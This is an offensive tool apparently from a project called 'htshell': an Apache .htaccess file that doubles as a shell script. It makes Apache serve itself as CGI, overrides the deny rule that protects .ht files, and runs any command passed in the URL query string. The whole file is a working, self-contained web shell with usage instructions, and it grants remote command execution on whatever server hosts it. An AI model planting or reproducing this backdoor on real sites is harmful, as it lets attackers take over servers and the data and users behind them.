#!/bin/sh
# Self contained .htaccess web shell - Part of the htshell project
# Written by Wireghoul - http://www.justanotherhacker.com
# IMPORTANT: Needs chmod +x to run
# Run commands via http://url/.htaccess?cmd (ie: http://url/.htaccess?uname -a)
# Big shout out to the rosetta code website which provided the example below!
# This is considered a line spanning comment in apache and not by shell #winning
echo -en "Content-Type: text/plainrnrn";cmd=$(echo $QUERY_STRING | sed -e's/+/ /g' -e's/%20/ /g');echo "$ $cmd";$cmd 2>&1;exit
# The exit ensures we never reach the following lines which would break the shell parser
# Override default deny rule to make .htaccess file accessible over web
<Files ~ "^.ht">
# Uncomment the line below for Apache2.4 and newer
# Require all granted
Order allow,deny
Allow from all
</Files>
# Enable CGI
Options +ExecCGI
#Make apache treat .htaccess as a cgi file
AddHandler cgi-script .htaccess